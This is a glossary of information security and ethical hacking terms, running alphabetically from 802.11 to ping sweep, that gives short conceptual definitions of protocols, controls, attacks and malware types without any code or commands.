802.11   Wireless LAN standards created by IEEE. 802.11a runs at up to 54 Mbps at 5 GHz, 802.11b runs at up to 11 Mbps at 2.4 GHz, 802.11g runs at up to 54 Mbps at 2.4 GHz, and 802.11n can run upward of 150 Mbps.

802.11i   A wireless LAN security standard developed by IEEE. Requires Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES).

acceptable use policy (AUP)   Policy stating what users of a system can and cannot do with the organization’s assets.

access control list (ACL)   A method of defining what rights and permissions an entity has to a given resource. In networking, access control lists are commonly associated with firewall and router traffic-filtering rules.

access creep   Occurs when authorized users accumulate excess privileges on a system because of moving from one position to another; allowances accidentally remain with the account from position to position.

access point (AP)   A wireless LAN device that acts as a central point for all wireless traffic. The AP is connected to both the wireless LAN and the wired LAN, providing wireless clients access to network resources.

accountability   The ability to trace actions performed on a system to a specific user or system entity.

acknowledgment (ACK)   A TCP flag notifying an originating station that the preceding packet (or packets) has been received.

active attack   An attack that is direct in nature—usually where the attacker injects something into, or otherwise alters, the network or system target.

Active Directory (AD)   The directory service created by Microsoft for use on its networks. It provides a variety of network services using Lightweight Directory Access Protocol (LDAP), Kerberos-based authentication, and single sign-on for user access to network-based resources.

active fingerprinting   Injecting traffic into the network to identify the operating system of a device.

ad hoc mode   A mode of operation in a wireless LAN in which clients send data directly to one another without utilizing a wireless access point (WAP), much like a point-to-point wired connection.

Address Resolution Protocol (ARP)   A protocol used to map a known IP address to a physical (MAC) address. It is defined in RFC 826. The ARP table is a list of IP addresses and corresponding MAC addresses stored on a local computer.

adware   Software that has advertisements embedded within it. It generally displays ads in the form of pop-ups.

algorithm   A step-by-step method of solving a problem. In computing security, an algorithm is a set of mathematical rules (logic) for the process of encryption and decryption.

annualized loss expectancy (ALE)   A measurement of the cost of an asset’s value to the organization and the monetary loss that can be expected for an asset due to risk over a one-year period. ALE is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE). It is mathematically expressed as ALE = ARO × SLE.

annualized rate of occurrence (ARO)   An estimate of the number of times during a year a particular asset would be lost or experience downtime.

anonymizer   A device or service designed to obfuscate traffic between a client and the Internet. It is generally used to make activity on the Internet as untraceable as possible.

antivirus (AV) software   An application that monitors a computer or network to identify, and prevent, malware. AV is usually signature-based and can take multiple actions on defined malware files/activity.

Application layer   Layer 7 of the OSI reference model. The Application layer provides services to applications to allow them access to the network. Protocols such as FTP and SMTP reside here.

application-level attacks   Attacks on the actual programming code of an application.

archive   A collection of historical records or the place where they are kept. In computing, an archive generally refers to backup copies of logs and/or data.

assessment   Activities to determine the extent to which a security control is implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

asset   Any item of value or worth to an organization, whether physical or virtual.

asymmetric   Literally, “not balanced or the same.” In computing, asymmetric refers to a difference in networking speeds upstream to downstream. In cryptography, it’s the use of more than one key for encryption/authentication purposes.

asymmetric algorithm   In computer security, an algorithm that uses separate keys for encryption and decryption.

asynchronous   1. The lack of clocking (imposed time ordering) on a bit stream. 2. An industry term referring to an implant or malware that does not require active interaction from the attacker.

asynchronous transmission   The transmission of digital signals without precise clocking or synchronization.

audit   Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend necessary changes.

audit data   Chronological record of system activities to enable the reconstruction and examination of the sequence of events and changes in an event.

audit trail   A record showing which user has accessed a given resource and what operations the user performed during a given period.

auditing   The process of recording activity on a system for monitoring and later review.

authentication   The process of determining whether a network entity (user or service) is legitimate—usually accomplished through a user ID and password. Authentication measures are categorized by something you know (user ID and password), something you have (smart card or token), or something you are (biometrics).

authentication, authorization, and accounting (AAA)   Authentication confirms the identity of the user or device. Authorization determines the privileges (rights) of the user or device. Accounting records the access attempts, both successful and unsuccessful.

authentication header (AH)   An Internet Protocol Security (IPSec) header used to verify that the contents of a packet have not been modified while the packet was in transit.

authenticity   Sometimes included as a security element, authenticity refers to the characteristic of data that ensures it is genuine.

authorization   The conveying of official access or legal power to a person or entity.

availability   The condition of a resource being ready for use and accessible by authorized users.

backdoor   A hidden capability in a system or program for bypassing normal computer authentication systems. A backdoor can be purposeful or the result of malware or other attack.

banner grabbing   An enumeration technique used to provide information about a computer system; generally used for operating system identification (also known as fingerprinting).

baseline   A point of reference used to mark an initial state in order to manage change.

bastion host   A computer placed outside a firewall to provide public services to other Internet sites and hardened to resist external attacks.

biometrics   A measurable, physical characteristic used to recognize the identity, or to verify the claimed identity, of an applicant. Facial images, fingerprints, and handwriting samples are all examples of biometrics.

bit flipping   A cryptographic attack where bits are manipulated in the cipher text to generate a predictable outcome in the plain text once it is decrypted.

black hat   An attacker who breaks into computer systems with malicious intent, without the owner’s knowledge or permission.

black-box testing   In penetration testing, a method of testing the security of a system or subnet without any previous knowledge of the device or network. It is designed to simulate an attack by an outside intruder (usually from the Internet).

block cipher   A symmetric key cryptographic algorithm that transforms a block of information at a time using a cryptographic key. For a block cipher algorithm, the length of the input block is the same as the length of the output block.

Blowfish   A symmetric, block-cipher data-encryption standard that uses a variable-length key that can range from 32 bits to 448 bits.

BlueBorne attack   An amalgamation of techniques and attacks against known, already existing Bluetooth vulnerabilities.

Bluejacking   Sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, tablets, and laptop computers.

Bluesnarfing   Unauthorized access to information such as calendars, contact lists, e-mails, and text messages on a wireless device through a Bluetooth connection.

Bluetooth   A proprietary, open, wireless technology used for transferring data from fixed and mobile devices over short distances.

boot sector virus   A virus that plants itself in a system’s boot sector and infects the master boot record.

brute-force password attack   A method of password cracking whereby all possible options are systematically enumerated until a match is found. These attacks try every password (or authentication option), one after another, until successful. Brute-force attacks take a long time to work and are easily detectable.

buffer   A portion of memory used to temporarily store output or input data.

buffer overflow   A condition that occurs when more data is written to a buffer than it has space to store, which results in data corruption or other system errors. This is usually because of insufficient bounds checking, a bug, or improper configuration in the program code.

bug   A software or hardware defect that often results in system vulnerabilities.

business continuity plan (BCP)   A set of plans and procedures to follow in the event of a failure or a disaster—security related or not—to get business services back up and running. BCPs include a disaster recovery plan (DRP) that addresses exactly what to do to recover any lost data or services.

business impact analysis (BIA)   An organizedprocess to gauge the potential effects of an interruption to critical business operations as a result of a disaster, accident, or emergency.

cache   A storage buffer that transparently stores data so future requests for the same data can be served faster.

CAM table   Content addressable memory table. A CAM table holds all the MAC-address-to-port mappings on a switch.

certificate   An electronic file used to verify a user’s identity, providing nonrepudiation throughout the system. It is also known as a digital certificate. It is also a set of data that uniquely identifies an entity. Certificates contain the entity’s public key, serial number, version, subject, algorithm type, issuer, valid dates, and key usage details.

certificate authority (CA)   A trusted entity that issues and revokes public key certificates. In a network, a CA is a trusted entity that issues, manages, and revokes security credentials and public keys for message encryption and/or authentication. Within a public key infrastructure (PKI), the CA works with registration authorities (RAs) to verify information provided by the requestor of a digital certificate.

Challenge Handshake Authentication Protocol (CHAP)   An authentication method on point-to-point links, using a three-way handshake and a mutually agreed-upon key.

CIA triad   Confidentiality, integrity, and availability. These are the three fundamental aspects of security.

cipher text   Text or data in its encrypted form; the result of plain text being input into a cryptographic algorithm.

client   A computer process that requests a service from another computer and accepts the server’s responses.

cloning   A cell phone attack in which the serial number from one cell phone is copied to another in an effort to copy the cell phone.

CNAME record   A Canonical Name record within DNS, used to provide an alias for a domain name.

cold site   A backup facility with the electrical and physical components of a computer facility, but with no computer equipment in place. The site is ready to receive the necessary replacement computer equipment in the event the user has to move from his main computing location to an alternate site.

collision   In regard to hash algorithms, a collision occurs when two or more distinct inputs produce the same output.

collision domain   A domain composed of all the systems sharing any given physical transport media. Systems within a collision domain may collide with each other during the transmission of data. Collisions can be managed by CSMA/CD (collision detection) or CSMA/CA (collision avoidance).

Common Internet File System/Server Message Block   An Application layer protocol used primarily by Microsoft Windows to provide shared access to printers, files, and serial ports. It also provides an authenticated interprocess communication mechanism.

community cloud   A cloud model where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.

community string   A string used for authentication in SNMP. The public community string is used for read-only searches, whereas the private community string is used for read-write. Community strings are transmitted in clear text in SNMPv1. SNMPv3 provides encryption for the strings as well as other improvements and options.

competitive intelligence   Freely and readily available information on an organization that can be gathered by a business entity about its competitor’s customers, products, and marketing. It can be used by an attacker to build useful information for further attacks.

Computer Emergency Response Team (CERT)   Name given to expert groups that handle computer security incidents.

computer-based attack   A social engineering attack using computer resources such as e-mail and IRC.

confidentiality   A security objective that ensures a resource can be accessed only by authorized users. This is also the security principle that stipulates sensitive information is not disclosed to unauthorized individuals, entities, or processes.

console port   Physical socket provided on routers and switches for cable connections between a computer and the router/switch. This connection enables the computer to configure, query, and troubleshoot the router/switch by use of a terminal emulator and a command-line interface.

contingency plan   Management policies and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of an emergency, system failure, or disaster.

cookie   A text file stored within a browser by a web server that maintains information about the connection. Cookies are used to store information to maintain a unique but consistent surfing experience but can also contain authentication parameters. Cookies can be encrypted and can have defined expiration dates.

copyright   A set of exclusive rights granted by the law of a jurisdiction to the author or creator of an original work, including the right to copy, distribute, and adapt the work.

corrective controls   Controls internal to a system designed to resolve vulnerabilities and errors soon after they arise.

countermeasures   Actions, devices, procedures, techniques, or other measures intended to reduce the vulnerability of an information system.

covert channel   A communications channel that is being used for a purpose it was not intended for, usually to transfer information secretly.

cracker   A cyberattacker who acts without permission from, and gives no prior notice to, the resource owner. This is also known as a malicious hacker.

crossover error rate (CER)   A comparison metric for different biometric devices and technologies, the CER is the point at which the false acceptance rate (FAR) equals the false rejection rate (FRR). As an identification device becomes more sensitive or accurate, its FAR decreases while its FRR increases. The CER is the point at which these two rates are equal, or cross over.

cross-site scripting (XSS)   An attack whereby the hacker injects code into an otherwise legitimate web page, which is then clicked by other users or is exploited via Java or some other script method. The embedded code within the link is submitted as part of the client’s web request and can execute on the user’s computer.

crypter   A software tool that uses a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products.

cryptographic key   A value used to control cryptographic operations, such as decryption, encryption, signature generation, and signature verification.

cryptography   The science or study of protecting information, whether in transit or at rest, by using techniques to render the information unusable to anyone who does not possess the means to decrypt it.

daemon   A background process found in Unix, Linux, Solaris, and other Unix-based operating systems.

daisy chaining   A method of external testing whereby several systems or resources are used together to make an attack.

Data Encryption Standard (DES)   An outdated symmetric cipher encryption algorithm, previously approved by the U.S. government and used by business and civilian government agencies. DES is no longer considered secure because of the ease with which the entire keyspace can be attempted using modern computing, thus making cracking the encryption easy.

Data Link layer   Layer 2 of the OSI reference model. This layer provides reliable transit of data across a physical link. The Data Link layer is concerned with physical addressing, network topology, access to the network medium, error detection, sequential delivery of frames, and flow control. The Data Link layer is composed of two sublayers: the MAC and the LLC.

database   An organized collection of data.

decryption   The process of transforming cipher text into plain text through the use of a cryptographic algorithm.

defense in depth   An information assurance strategy in which multiple layers of defense are placed throughout an information technology system.

demilitarized zone (DMZ)   A partially protected zone on a network, not exposed to the full fury of the Internet but not fully behind the firewall. This technique is typically used on parts of the network that must remain open to the public (such as a web server) but must also access trusted resources (such as a database). The point is to allow the inside firewall component, guarding the trusted resources, to make certain assumptions about the impossibility of outsiders forging DMZ addresses.

denial of service (DoS)   An attack with the goal of preventing authorized users from accessing services and preventing the normal operation of computers and networks.

detective controls   Controls to detect anomalies or undesirable events occurring on a system.

digital certificate   Also known as a public key certificate, a digital certificate is an electronic file that is used to verify a user’s identity, providing nonrepudiation throughout the system. Certificates contain the entity’s public key, serial number, version, subject, algorithm type, issuer, valid dates, and key usage details.

digital signature   The result of using a private key to encrypt a hash value for identification purposes within a PKI system. The signature can be decoded by the originator’s public key, verifying his identity and providing nonrepudiation. A valid digital signature gives a recipient verification the message was created by a known sender.

digital watermarking   The process of embedding information into a digital signal in a way that makes it difficult to remove.

directory traversal attack   Also known as the dot-dot-slash attack. Using directory traversal, the attacker attempts to access restricted directories and execute commands outside intended web server directories by using the URL to redirect to an unintended folder location.

disaster recovery plan (DRP)   A documented set of procedures to recover business infrastructures in the event of a disaster.

discretionary access control (DAC)   The basis of this kind of security is that an individual user, or program operating on the user’s behalf, is allowed to specify explicitly the types of access other users (or programs executing on their behalf) may have to information under the user’s control.

distributed DoS (DDoS)   A denial-of-service technique that uses numerous hosts to perform the attack.

DNS enumeration   The process of using easily accessible DNS records to map a target network’s internal hosts.

domain name   A unique hostname that is used to identify resources on the Internet. Domain names start with a root (.) and then add a top level (.com, .gov, or .mil, for example) and a given namespace.

Domain Name System (DNS)   A network system of servers that translates numeric Internet Protocol (IP) addresses into human-friendly, hierarchical Internet addresses, and vice versa.

Domain Name System (DNS) cache poisoning   An attack technique that tricks your DNS server into believing it has received authentic information when, in reality, it has been provided fraudulent data. DNS cache poisoning affects user traffic by sending it to erroneous or malicious endpoints instead of its intended destination.

Domain Name System (DNS) lookup   The process of a system providing a fully qualified domain name (FQDN) to a local name server, for resolution to its corresponding IP address.

doxing   The process of searching for and publishing private information about a target (usually an individual) on the Internet, typically with malicious intent.

droppers   Malware designed to install some sort of virus, backdoor, and so on, on a target system.

due care   A term representing the responsibility managers and their organizations have to provide information security to ensure the type of control, the cost of control, and the deployment of control are appropriate for the system being managed.

due diligence   Steps taken to identify and limit risks to an acceptable or reasonable level of exposure.

dumpster diving   A physical security attack where the attacker sifts through garbage and recycle bins for information that may be useful on current and future attacks.

eavesdropping   The act of secretly listening to the private conversations of others without their consent. This can also be done over telephone lines (wiretapping), e-mail, instant messaging, and other methods of communication considered private.

ECHO reply   A type 0 ICMP message used to reply to ECHO requests. It is used with ping to verify Network layer connectivity between hosts.

EDGAR database   A system used by the Securities and Exchange Commission (SEC) for companies and businesses to transmit required filings and information. The EDGAR database performs automated collection, validation, indexing, acceptance, and forwarding of submissions by companies and others who are required by law to file forms with the U.S. Securities and Exchange Commission. The database is freely available to the public via the Internet and is a potential source of information for hackers.

Electronic Code Book (ECB)   A mode of operation for a block cipher, with the characteristic that each possible block of plain text has a defined corresponding cipher-text value, and vice versa.

electronic serial number   Created by the U.S. Federal Communications Commission to uniquely identify mobile devices; often represented as an 11-digit decimal number or 8-digit hexadecimal number.

encapsulation   The process of attaching a particular protocol header and trailer to a unit of data before transmission on the network. It occurs at Layer 2 of the OSI reference model.

encryption   Conversion of plain text to cipher text through the use of a cryptographic algorithm.

end user licensing agreement (EULA)   A software license agreement; a contract between the “licensor” and purchaser establishing the right to use the software.

Enterprise Information Security Architecture (EISA)   A collection of requirements and processes that help determine how an organization’s information systems are built and how they work.

enumeration   In penetration testing, enumeration is the act of querying a device or network segment thoroughly and systematically for information.

Ethernet   Baseband LAN specification developed by Xerox Corporation, Intel, and Digital Equipment Corporation. This is one of the least expensive, most widely deployed networking standards; it uses the CSMA/CD method of media access control.

ethical hacker   A computer security expert who performs security audits and penetration tests against systems or network segments, with the owner’s full knowledge and permission, in an effort to increase security.

event   Any network incident that prompts some kind of log entry or other notification.

exploit   Software code, a portion of data, or a sequence of commands intended to take advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software or hardware.

exposure factor   The subjective, potential percentage of loss to a specific asset if a specific threat is realized. The exposure factor (EF) is a subjective value the person assessing risk must define.

Extensible Authentication Protocol (EAP)   Originally an extension of PPP, EAP is a protocol for authentication used within wireless networks. It works with multiple authentication measures.

false acceptance rate (FAR)   The rate at which a biometric system will incorrectly identify an unauthorized individual and allow them access (see false negative).

false negative   A situation in which an IDS does not trigger on an event that was an intrusion attempt. False negatives are considered more dangerous than false positives.

false positive   A situation in which an IDS or other sensor triggers on an event as an intrusion attempt, when it was actually legitimate traffic.

false rejection rate (FRR)   The rate at which a biometric system will incorrectly reject an access attempt by an authorized user.

Fast Ethernet   An Ethernet networking system transmitting data at 100 million bits per second (Mbps), ten times the speed of an earlier Ethernet standard. Derived from the Ethernet 802.3 standard, it is also known as 100BaseT.

Fiber Distributed Data Interface (FDDI)   LAN standard, defined by ANSI X3T9.5, specifying a 100-Mbps token-passing network using fiber-optic cable and a dual-ring architecture for redundancy, with transmission distances of up to 2 kilometers.

File Allocation Table (FAT)   A computer file system architecture used in Windows, OS/2, and most memory cards.

File Transfer Protocol (FTP)   An Application layer protocol, using TCP, for transporting files across an Internet connection. FTP transmits in clear text.

filter   A set of rules defined to screen network packets based on source address, destination address, or protocol. These rules determine whether the packet will be forwarded or discarded.

Finger   An early network application that provides information on users currently logged on to a machine.

firewalking   The process of systematically testing each port on a firewall to map rules and determine accessible ports.

firewall   Software or hardware components that restrict access between a protected network and the Internet, or between other sets of networks, to block unwanted use or attacks.

flood   Traffic-passing technique used by bridges and switches in which traffic received on an interface is sent out all interfaces on the device except the interface on which the information was originally received. Traffic on a switch is flooded when it is broadcast in nature (intended for a broadcast address, as with ARP or other protocols) or if the switch does not have an entry in the CAM table for the destination MAC.

footprinting   All measures and techniques taken to gather information about an intended target. Footprinting can be passive or active.

forwarding   The process of sending a packet or frame toward the destination. In a switch, messages are forwarded only to the port to which they are addressed.

fragmentation   Process of breaking a packet into smaller units when it is being transmitted over a network medium that’s unable to support a transmission unit the original size of the packet.

FreeBSD   A free and popular version of the Unix operating system.

fully qualified domain name (FQDN)   A fully qualified domain name consists of a host and domain name, including a top-level domain such as .com, .net, .mil, .edu, and so on.

gap analysis   A tool that helps a company compare its actual performance with its potential performance.

gateway   A device that provides access between two or more networks. Gateways are typically used to connect dissimilar networks.

GET   A command used in HTTP and FTP to retrieve a file from a server.

Government Access to Keys (GAK)   An attempt through key disclosure laws to have software companies provide copies of all keys to the government, which will be used only when a warrant is provided during law enforcement efforts.

gray hat   A skilled hacker who straddles the line between white hat (hacking only with permission and within guidelines) and black hat (malicious hacking for personal gain). Gray hats sometime perform illegal acts to exploit technology with the intent of achieving better security.

gray-box testing   A penetration test in which the ethical hacker has limited knowledge of the intended target(s). Designed to simulate an internal but non-system-administrator-level attack.

hack value   The idea a hacker holds about the perceived worth or interest in attacking a target.

hacktivism   The act or actions of a hacker to put forward a cause or a political agenda, to affect some societal change, or to shed light on something he feels to be a political injustice. These activities are usually illegal in nature.

halo effect   A well-known and well-studied phenomenon of human nature, whereby a single trait influences the perception of other traits.

hardware keystroke logger   A hardware device used to log keystrokes covertly. Hardware keystroke loggers are dangerous because they cannot be detected through regular software/anti-malware scanning.

hash   A unique numerical string, created by a hashing algorithm on a given piece of data, used to verify data integrity. Generally hashes are used to verify the integrity of files after download (comparison to the hash value on the site before download) and/or to store password values.

hashing algorithm   A one-way mathematical function that generates a fixed-length numerical string (hash) from a given data input. MD5 and SHA-1 are hashing algorithms.

heuristic scanning   Method used by antivirus software to detect new, unknown viruses that have not yet been identified; based on a piece-by-piece examination of a program, heuristic scanning looks for a sequence or sequences of instructions that differentiate the virus from “normal” programs.

HIDS   Host-based IDS. An IDS that resides on the host, protecting against file and folder manipulation and other host-based attacks and actions.

Hierarchical File System (HFS)   A file system used by macOS.

honeynet   A network deployed as a trap to detect, deflect, or deter unauthorized use of information systems.

honeypot   A host designed to collect data on suspicious activity.

hot site   A fully operational off-site data-processing facility equipped with hardware and system software to be used in the event of a disaster.

HTTP tunneling   A firewall-evasion technique whereby packets are wrapped in HTTP, as a covert channel to the target.

human-based social engineering   Using conversation or some other interaction between people to gather useful information.

hybrid attack   An attack that combines a brute-force attack with a dictionary attack.

hybrid cloud   A cloud model that is a composite of two or more cloud deployment models (public, private, or community).

Hypertext Transfer Protocol (HTTP)   A communications protocol used for browsing the Internet.

Hypertext Transfer Protocol Secure (HTTPS)   A hybrid of the HTTP and SSL/TLS protocols that provides encrypted communication and secure identification of a web server.

IaaS   Infrastructure as a Service. A cloud computing type providing virtualized computing resources over the Internet.

identity theft   A form of fraud in which someone pretends to be someone else by assuming that person’s identity, typically in order to access resources or obtain credit and other benefits in that person’s name.

impersonation   A social engineering effort in which the attacker pretends to be an employee, a valid user, or even an executive to elicit information or access.

inference attack   An attack in which the hacker can derive information from the cipher text without actually decoding it. Sensitive information can be considered compromised if an adversary can infer its real value with a high level of confidence.

information technology (IT) asset criticality   The level of importance assigned to an IT asset.

information technology (IT) asset valuation   The monetary value assigned to an IT asset.

information technology (IT) infrastructure   The combination of all IT assets, resources, components, and systems.

information technology (IT) security architecture and framework   A document describing information security guidelines, policies, procedures, and standards.

Information Technology Security Evaluation Criteria (ITSEC)   A structured set of criteria for evaluating computer security within products and systems produced by European countries; it has been largely replaced by the Common Criteria.

infrastructure mode   A wireless networking mode where all clients connect to the wireless network through a central access point.

initial sequence number (ISN)   A number assigned during TCP startup sessions that tracks how much information has been moved. This number is used by hackers when hijacking sessions.

insider affiliate   A spouse, friend, or client of an employee who uses the employee’s credentials to gain physical or logical access to organizational resources.

insider associate   A person with limited authorized access to the organization; contractors, guards, and cleaning services are all examples.

Institute of Electrical and Electronics Engineers (IEEE)   An organization composed of engineers, scientists, and students who issue standards related to electrical, electronic, and computer engineering.

integrity   The security property that data is not modified in an unauthorized and undetected manner. Also, this is the principle of taking measures to ensure that data received is in the same condition and state as when it was originally transmitted.

Interior Gateway Protocol (IGP)   An Internet routing protocol used to exchange routing information within an autonomous system.

International Organization for Standardization (ISO)   An international organization composed of national standards bodies from more than 75 countries. ISO developed the OSI reference model.

Internet Assigned Number Authority (IANA)   The organization that governs the Internet’s top-level domains, IP address allocation, and port number assignments.

Internet Control Message Protocol (ICMP)   A protocol used to pass control and error messages between nodes on the Internet.

Internet of Things (IoT)   The collection of devices using sensors, software, storage, and electronics to collect, analyze, store, and share data among themselves or to a user, with or without human intervention or action.

Internet Protocol (IP)   A protocol for transporting data packets across a packet-switched internetwork (such as the Internet). IP is a routed protocol.

Internet Protocol Security (IPSec) architecture   A suite of protocols used for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a communication session. This suite includes protocols for establishing mutual authentication between agents at session establishment and for negotiating the cryptographic keys to be used throughout the session.

Internet service provider (ISP)   A business, government agency, or educational institution that provides access to the Internet.

intranet   A self-contained network with a limited number of participants who extend limited trust to one another in order to accomplish an agreed-upon goal.

intrusion detection system (IDS)   A security tool designed to protect a system or network against attacks by comparing traffic patterns against a list of both known attack signatures and general characteristics of how attacks may be carried out. Threats are rated and reported.

intrusion prevention system (IPS)   A security tool designed to protect a system or network against attacks by comparing traffic patterns against a list of both known attack signatures and general characteristics of how attacks may be carried out. Threats are rated and protective measures taken to prevent the more significant threats.

IoT Gateway   A device designed to send collected data from IoT devices to the user or to data storage (the cloud) for use later.

iris scanner   A biometric device that uses pattern-recognition techniques based on images of the irises of an individual’s eyes.

ISO 17799   A standard that provides best-practice recommendations on information security management for use by those responsible for initiating, implementing, or maintaining Information Security Management Systems (ISMS). Information security is defined within the standard in the context of the CIA triad.

Kerberos   A widely used authentication protocol developed at the Massachusetts Institute of Technology (MIT). Kerberos authentication uses tickets, a ticket granting service, and a key distribution center.

key exchange protocol   A method in cryptography by which cryptographic keys are exchanged between users, thus allowing use of a cryptographic algorithm (for example, the Diffie-Hellman key exchange).

keylogger   A software application or hardware device that captures user keystrokes.

last in first out (LIFO)   A programming principle whereby the last piece of data added to the stack is the first piece of data taken off.

Level I assessment   An evaluation consisting of a document review, interviews, and demonstrations. No hands-on testing is performed.

Level II assessment   An evaluation consisting of a document review, interviews, and demonstrations, as well as vulnerability scans and hands-on testing.

Level III assessment   An evaluation in which testers attempt to penetrate the network.

Lightweight Directory Access Protocol (LDAP)   An industry-standard protocol used for accessing and managing information within a directory service; an application protocol for querying and modifying data using directory services running over TCP/IP.

limitation of liability and remedies   A legal limit on the amount of financial liability and remedies the organization is responsible for taking on.

local area network (LAN)   A computer network confined to a relatively small area, such as a single building or campus.

logic bomb   A piece of code intentionally inserted into a software system that will perform a malicious function when specified conditions are met at some future point.

MAC filtering   A method of permitting only MAC addresses in a preapproved list of network access. Addresses not matching are blocked.

macro virus   A virus written in a macro language and usually embedded in document or spreadsheet files.

malicious code   Software or firmware intended to perform an unauthorized process that will have an adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host.

malware   A program or piece of code inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system. Malware consists of viruses, worms, and other malicious code.

mandatory access control (MAC)   A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (that is, clearance) of users to access information of such sensitivity.

man-in-the-middle attack   An attack where the hacker positions himself between the client and the server to intercept (and sometimes alter) data traveling between the two.

mantrap   A small space having two sets of interlocking doors; the first set of doors must close before the second set opens. Typically authentication is required for each door, often using different factors. For example, a smartcard may open the first door, and a personal identification number entered on a number pad opens the second.

master boot record infector   A virus designed to infect the master boot record.

maximum tolerable downtime (MTD)   A measurement of the potential cost due to a particular asset being unavailable, used as a means to prioritize the recovery of assets should the worst occur.

MD5   A hashing algorithm that results in a 128-bit output.

Media Access Control (MAC)   A sublayer of Layer 2 of the OSI model, the Data Link layer. It provides addressing and channel access control mechanisms that enable several terminals or network nodes to communicate within a multipoint network.

methodology   A documented process for a procedure designed to be consistent, repeatable, and accountable.

minimum acceptable level of risk   An organization’s threshold for the seven areas of information security responsibility. This level is established based on the objectives for maintaining the confidentiality, integrity, and availability of the organization’s IT assets and infrastructure and will determine the resources expended for information security.

multipartite virus   A computer virus that infects and spreads in multiple ways.

Multipurpose Internet Mail Extensions (MIME)   An extensible mechanism for e-mail. A variety of MIME types exist for sending content such as audio, binary, or video using the Simple Mail Transfer Protocol (SMTP).

National Security Agency (NSA) INFOSEC Assessment Methodology (IAM)   A systematic process for the assessment of security vulnerabilities.

NetBSD   A free, open source version of the Berkeley Software Distribution of Unix, often used in embedded systems.

NetBus   A software program for remotely controlling a Microsoft Windows computer system over a network. Generally it is considered malware.

network access server   A device providing temporary, on-demand, point-to-point network access to users.

Network Address Translation (NAT)   A technology where you advertise one IP address externally and data packets are rerouted to the appropriate IP address inside your network by a device providing translation services. In this way, IP addresses of machines on your internal network are hidden from external users.

Network Basic Input/Output System (NetBIOS)   An API that provides services related to the OSI model’s Session layer, allowing applications on separate computers to communicate over a LAN.

network interface card (NIC)   An adapter that provides the physical connection to send and receive data between the computer and the network media.

network operations center (NOC)   One or more locations from which control is exercised over a computer, television broadcast, or telecommunications network.

network tap   Any kind of connection that allows you to see all traffic passing by. Generally used in reference to a network-based IDS (NIDS) to monitor all traffic.

Nmap   An open source scanning utility used to discover hosts and services on a network.

node   A device on a network.

nonrepudiation   The means by which a recipient of a message can ensure the identity of the sender and that neither party can deny having sent or received the message. The most common method is through digital certificates.

NOP   A command that instructs the system processor to do nothing. Many overflow attacks involve stringing several NOP operations together (known as a NOP sled).

nslookup   A network administration command-line tool available for many operating systems for querying the Domain Name System (DNS) to obtain domain name or IP address mappings or any other specific DNS record.

NT LAN Manager (NTLM)   The default network authentication suite of protocols for Windows NT 4.0—retained in later versions for backward compatibility. NTLM is considered insecure and was replaced by NTLMv2.

null session   An anonymous connection to an administrative share (IPC$) on a Windows machine. Null sessions allow for enumeration of Windows machines, among other attacks.

open source   Describes practices in production and development that promote access to the end product’s source materials.

Open Source Security Testing Methodology Manual (OSSTMM)   A peer-reviewed, formalized methodology of security testing and analysis.

Open System Interconnection (OSI) reference model   A network architecture framework developed by ISO that describes the communications process between two systems across the Internet in seven distinct layers.

OpenBSD   A Unix-like computer operating system descending from the BSD. OpenBSD includes a number of security features absent or optional in other operating systems.

operating system attack   An attack that exploits the common mistake many people make when installing operating systems—that is, accepting and leaving all the defaults.

out-of-band signaling   Transmission using channels or frequencies outside those normally used for data transfer; often used for error reporting.

outsider associate   A untrusted outsider using open, or illicitly gained, access to an organization’s resources.

overt channel   A communications path, such as the Internet, authorized for data transmission within a computer system or network.

PaaS   Platform as a Service. A cloud computing type geared toward software development, providing a platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.

packer   A crypter that uses compression to pack malware executables into smaller sizes to avoid detection.

packet   A unit of information formatted according to specific protocols, generally regarded as being used in OSI Layer 3, that allows precise transmittal of data from one network node to another. Also called a datagram or data packet, a packet contains a header (container) and a payload (contents). Any IP message larger than 1500 bytes will be fragmented into packets for transmission.

packet filtering   Controlling access to a network by analyzing the headers of incoming and outgoing packets and letting them pass or discarding them based on rule sets created by a network administrator. A packet filter allows or denies packets based on destination, source, and/or port.

Packet Internet Groper (ping)   A utility that sends an ICMP Echo message to determine whether a specific IP address is accessible; if the message receives a reply, the address is reachable.

parameter tampering   An attack where the hacker manipulates parameters within the URL string in hopes of modifying data.

passive attack   An attack against an authentication protocol in which the attacker intercepts data in transit along the network between the claimant and verifier but does not alter the data (in other words, eavesdropping).

Password Authentication Protocol (PAP)   A simple PPP authentication mechanism in which the user name and password are transmitted in clear text to prove identity. PAP compares the user name and password to a table listing authorized users.

patch   A piece of software, provided by the vendor, intended to update or fix known, discovered problems in a computer program or its supporting data.

pattern matching   The act of checking some sequence of tokens for the presence of the constituents of some pattern.

payload   The contents of a packet. A system attack requires the attacker to deliver a malicious payload that is acted upon and executed by the system.

Payment Card Industry Data Security Standard (PCI-DSS)   A security standard for organizations handling credit cards, ATM, and other point-of-sales cards. The standards apply to all groups and organizations involved in the entirety of the payment process—from card issuers to merchants to those storing and transmitting card information—and consist of 12 requirements.

penetration testing   A method of evaluating the security of a computer system or network by simulating an attack from a malicious source.

personal identification number (PIN)   A secret, typically consisting of only decimal digits, that a claimant memorizes and uses to authenticate his identity.

phishing   The use of deceptive computer-based means to trick individuals into disclosing sensitive personal information—usually via a carefully crafted e-mail message.

physical security   Security measures, such as a locked door, perimeter fence, or security guard, to prevent or deter physical access to a facility, resource, or information stored on physical media.

piggybacking   When an authorized person allows (intentionally or unintentionally) someone to pass through a secure door, despite the intruder not having a badge.

ping sweep   The process of pinging each address within a subnet to map potential targets. Ping sweeps are unreliable and easily detectable but very fast.

